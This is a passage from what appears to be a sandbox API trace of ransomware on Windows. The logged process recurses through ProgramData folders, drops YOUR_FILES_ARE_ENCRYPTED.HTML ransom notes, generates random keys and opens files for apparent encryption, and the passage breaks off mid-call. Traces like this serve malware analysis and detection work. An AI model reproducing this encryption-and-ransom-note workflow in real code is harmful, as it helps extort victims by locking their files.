nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Keys", cAlternateFileName="")) returned 1 [0156.690] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys") returned 40 [0156.690] GetProcessHeap () returned 0x270000 [0156.691] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.691] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys" [0156.691] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*" [0156.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.691] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.691] FindNextFileW (in: 
hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.691] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.691] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0156.691] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.691] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.693] CloseHandle (hObject=0x58c) returned 1 [0156.694] GetProcessHeap () returned 0x270000 [0156.694] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.694] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 1 [0156.694] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA") returned 39 [0156.694] GetProcessHeap () returned 0x270000 [0156.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.695] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA" [0156.695] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*" [0156.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.695] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.695] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0156.695] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 51 [0156.695] GetProcessHeap () returned 0x270000 [0156.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.695] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys" [0156.695] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*" [0156.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.695] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.695] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.695] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.695] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0156.696] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.696] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.698] CloseHandle (hObject=0x598) returned 1 [0156.698] GetProcessHeap () returned 0x270000 [0156.699] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 
[0156.699] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0156.699] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.699] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.699] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.703] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.705] CloseHandle (hObject=0x58c) returned 1 [0156.706] GetProcessHeap () returned 0x270000 [0156.706] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.706] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 0 [0156.706] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.706] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0156.706] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.707] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.709] CloseHandle (hObject=0x4a8) returned 1 [0156.709] GetProcessHeap () returned 0x270000 [0156.710] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.713] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0156.713] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage") returned 41 [0156.713] GetProcessHeap () returned 0x270000 [0156.713] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 
0x75e0048 [0156.722] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage" [0156.722] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*" [0156.722] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.723] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.723] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="Device", cAlternateFileName="")) returned 1 [0156.723] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device") returned 48 [0156.723] GetProcessHeap () returned 0x270000 [0156.723] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.724] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device" [0156.724] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*" [0156.724] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.724] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.725] FindNextFileW 
(in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0156.725] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 87 [0156.725] GetProcessHeap () returned 0x270000 [0156.725] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.727] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0156.727] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*" [0156.727] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, 
ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.729] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.729] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa825f5e7, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa825f5e7, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d7b99dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x60, cFileName="background.png", cAlternateFileName="")) returned 1 [0156.729] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 102 [0156.729] lstrcmpW (lpString1="background.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.729] PathFindExtensionW (pszPath="background.png") returned=".png" [0156.729] lstrlenW (lpString=".png") returned 4 [0156.729] PathFindExtensionW (pszPath="background.png") returned=".png" [0156.729] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.729] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.730] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dad96bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x1dad96bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x1dad96bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x0, dwReserved1=0x60, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0156.730] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 100 [0156.730] lstrcmpW (lpString1="behavior.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.730] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0156.730] lstrlenW (lpString=".xml") returned 4 [0156.730] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0156.730] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.730] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 
